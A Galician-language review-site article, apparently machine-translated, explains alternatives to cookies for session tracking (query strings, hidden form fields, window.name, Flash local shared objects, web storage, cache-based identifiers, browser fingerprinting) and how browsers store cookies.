Este método consiste en que o servidor web engada solicitudes de cadea ás ligazóns da páxina web que a leva cando se envía ao navegador. Cando o usuario segue unha ligazón, o navegador devolve a cadea de consulta anexa ao servidor.

As cadeas de consulta utilizadas para este fin e as cookies son moi similares, sendo ambas información elixida arbitrariamente polo servidor e devolta polo navegador. Non obstante, hai algunhas diferenzas: cando se reutiliza un URL que contén unha cadea de consulta, a mesma información envíase ao servidor. Por exemplo, se as preferencias dun usuario están codificadas nunha cadea de consulta dun URL e o usuario envía ese URL a outro usuario por correo electrónico, ese usuario tamén poderá utilizar esas preferencias.

Por outra banda, cando un usuario accede dúas veces á mesma páxina, non hai garantía de que se use a mesma cadea de consulta as dúas veces. Por exemplo, se un usuario aterriza nunha páxina dunha páxina interna do sitio a primeira vez e aterriza na mesma páxina desde unha páxina externa a segunda vez, a cadea de consulta relativa á páxina do sitio adoita ser diferente, mentres que as cookies son as mesmas. .

Outras desvantaxes das cadeas de consulta están relacionadas coa seguridade: manter os datos que identifican unha sesión en cadeas de consulta permite ou simplifica os ataques de fixación de sesións, os ataques de referencia de identificadores e outras explotacións. Pasar ID de sesión como cookies HTTP é máis seguro.

Campo de formulario oculto

Unha forma de seguimento de sesións, utilizada por ASP.NET, é usar formularios web con campos ocultos. Esta técnica é moi semellante ao uso de cadeas de consulta de URL para transportar información e ten as mesmas vantaxes e desvantaxes; e se o formulario se procesa co método HTTP GET, os campos pasan a formar parte do URL do navegador que o enviará ao enviar o formulario. Pero a maioría dos formularios son procesados ​​con HTTP POST, o que fai que a información do formulario, incluídos os campos ocultos, se engada como entrada adicional que non forma parte do URL nin dunha cookie.

Este enfoque ten dúas vantaxes desde a perspectiva do seguimento: primeiro, o seguimento da información colocada no código fonte HTML e a entrada POST en lugar do URL permitirá ao usuario medio evitar este seguimento; segundo, a información da sesión non se copia cando o usuario copia o URL (para gardar a páxina no disco ou enviala por correo electrónico, por exemplo).

fiestra.nome

Todos os navegadores web comúns poden almacenar unha gran cantidade de datos (de 2 MB a 32 MB) a través de JavaScript usando a propiedade window.name do DOM. Estes datos pódense usar en lugar de cookies de sesión e tamén se usan en dominios. A técnica pódese combinar con obxectos JSON para almacenar un conxunto complexo de variables de sesión do lado do cliente.

A desvantaxe é que cada fiestra ou pestana separada terá inicialmente unha ventá.nome baleira; ao navegar por pestanas (abertas polo usuario) isto significa que as pestanas abertas individualmente non terán un nome de xanela. Ademais, window.name pódese usar para rastrexar os visitantes en diferentes sitios que poden supoñer un problema de privacidade.

Nalgúns aspectos isto pode ser máis seguro que as cookies, debido á non implicación do servidor, polo que é invulnerable ao ataque da rede das cookies sniffer. Non obstante, se se toman medidas especiais para protexer os datos, é vulnerable a novos ataques, xa que os datos están dispoñibles a través doutros sitios abertos na mesma xanela.

Autenticación HTTP

O protocolo HTTP inclúe os protocolos básicos de autenticación de acceso e o resumo de autenticación de acceso, que permite o acceso a unha páxina web só cando o usuario deu o nome de usuario e o contrasinal. Se o servidor solicita un certificado para conceder acceso a unha páxina web, o navegador solicítao ao usuario e unha vez obtido, o navegador gárdao e envíao en todas as solicitudes HTTP posteriores. Esta información pódese usar para rastrexar o usuario.

Obxecto local compartido

Se un navegador inclúe o complemento Adobe Flash Player, o obxectos compartidos locais pódese utilizar co mesmo propósito que as cookies. Poden ser unha opción atractiva para os desenvolvedores web porque:

  • o límite de tamaño predeterminado para un obxecto compartido local é de 100 KB;
  • as comprobacións de seguranza están separadas das comprobacións de cookies dos usuarios (polo que se poden permitir obxectos compartidos locais cando as cookies non o están).

Este último punto, que distingue a política de xestión de cookies da dos obxectos compartidos locais de Adobe suscita preguntas relativo á xestión por parte do usuario da súa configuración de privacidade: debe ser consciente de que a súa xestión de cookies non ten ningún impacto na xestión dos obxectos compartidos locais, e viceversa.

Outra crítica a este sistema é que só se pode usar a través do complemento Adobe Flash Player que é propietario e non un estándar web.

Persistencia do lado do cliente

Algúns navegadores web admiten un mecanismo de persistencia baseado en scripts, que permite que a páxina almacene información localmente para o seu uso posterior. Internet Explorer, por exemplo, admite a información persistente no historial do navegador, nos marcadores, nun formato almacenado en XML ou directamente cunha páxina web gardada no disco. Para Microsoft Internet Explorer 5, hai un método de datos de usuario dispoñible mediante comportamentos DHTML.

O W3C introduciu en HTML 5 unha nova API de JavaScript para o almacenamento de datos no lado do cliente chamada almacenamento web e que tiña como obxectivo substituír as cookies de forma permanente. É semellante ás cookies pero cunha capacidade moi mellorada e sen almacenar información na cabeceira das solicitudes HTTP. A API permite dous tipos de almacenamento web: almacenamento local e almacenamento de sesións, semellante ás cookies persistentes e ás cookies de sesión (excepto que as cookies de sesión caducan cando se pecha o navegador mentres almacenamento de sesións caduca cando se pecha a pestana), respectivamente. O almacenamento web é compatible con Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 e Opera 10.50.

Un mecanismo diferente normalmente depende da memoria caché do navegador (na memoria en lugar de actualizar) mediante programas JavaScript nas páxinas web. 

Por exemplo, unha páxina pode conter a etiqueta . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Neste punto, o programa permanece na memoria caché e a páxina visitada non se recarga unha segunda vez. En consecuencia, se o programa contén unha variable global (por exemplo, var id = 3243242;), este identificador segue sendo válido e pode ser explotado por outro código JavaScript unha vez que se cargue de novo a páxina ou unha vez que se cargue unha páxina que enlaza o programa. 

A principal desvantaxe deste método é que a variable global de JavaScript debe ser estática, o que significa que non se pode cambiar nin eliminar como unha cookie.

pegada dixital do navegador web

Unha pegada dixital do navegador é a información recollida sobre os axustes de configuración dun navegador con fins de identificación. Estas pegadas dixitais pódense utilizar para identificar total ou parcialmente un usuario de Internet ou un dispositivo aínda que as cookies estean desactivadas.

Os servizos de audiencia do sitio web recompilan a información básica de configuración do navegador web co propósito de medir con precisión o tráfico web humano e detectar varias formas de fraude por clic. Coa axuda das linguaxes de script do lado do cliente, a recollida de información é moito máis precisa agora posible.

Converter esta información nunha cadea de bits produce unha pegada dixital do dispositivo. En 2010, a Electronic Frontier Foundation (EFF) mediu que a entropía da pegada dixital dun navegador era polo menos 18,1 anacos, e iso foi antes de que os avances na impresión dixital de lenzos engadiran 5,7 bits a esa entropía.

Galletas en poucas palabras

As cookies son pequenos ficheiros de texto almacenados polo navegador web no disco duro do visitante do sitio web e que se utilizan (entre outras cousas) para rexistrar información sobre o visitante ou a súa viaxe polo sitio. O webmaster pode así recoñecer os hábitos dun visitante e personalizar a presentación do seu sitio para cada visitante; as cookies permiten lembrar cantos artigos mostrar na páxina de inicio ou mesmo conservar as credenciais de inicio de sesión de calquera persoa privada: cando o visitante volve ao sitio, xa non é necesario que escriba o seu nome e contrasinal para ser recoñecidos, xa que se len automaticamente na cookie.

Unha cookie ten unha vida útil limitada, establecida polo deseñador do sitio. Tamén poden caducar ao final da sesión no sitio, o que corresponde ao peche do navegador. As cookies son moi utilizadas para facilitarlles a vida aos visitantes e presentarlles información máis relevante. Pero técnicas especiais permiten seguir a un visitante en varios sitios e así recoller e contrastar información moi ampla sobre os seus hábitos. Este método deulle fama ao uso de cookies como unha técnica de vixilancia que atenta contra a privacidade dos visitantes, o que lamentablemente se corresponde coa realidade en moitos casos de uso por motivos non técnicos ou non respectuosos coas expectativas dos usuarios.

En resposta a estes temores lexítimos, HTML 5 introduce unha nova API de JavaScript para o almacenamento de datos no lado do cliente chamada almacenamento web, moito máis segura e con maior capacidade, que pretende substituír as cookies.

Almacenamento de cookies

Con algúns navegadores, unha cookie é facilmente editable, un simple editor de texto como o Bloc de notas é suficiente para cambiar os seus valores manualmente.

As cookies gárdanse de forma diferente dependendo do navegador:

  • Microsoft Internet Explorer garda cada cookie nun ficheiro diferente;
  • Mozilla Firefox garda todas as súas cookies nun único ficheiro;
  • Ópera garda todas as súas cookies nun único ficheiro e encriptaas (imposible modificalas salvo nas opcións do software);
  • Apple Safari garda todas as súas cookies nun único ficheiro de extensión .plist. A modificación é posible pero non moi doada, a non ser que pases polas opcións do software.

Os navegadores son necesarios para soportar uns mínimos :

  • 300 cookies simultáneas;
  • 4 o por galleta;
  • 20 cookies por host ou dominio.
[Total: 0 Media: 0]

escrito por Editores de recensións

O equipo de editores expertos pasa o seu tempo investigando produtos, realizando probas prácticas, entrevistando profesionais da industria, revisando as opinións dos consumidores e escribindo todos os nosos resultados como resumos comprensibles e completos.

Deixe un comentario

O seu enderezo de correo electrónico non se publicará. Os campos obrigatorios están marcados *

¿Que pensas?

384 Puntos
Upvote Downvote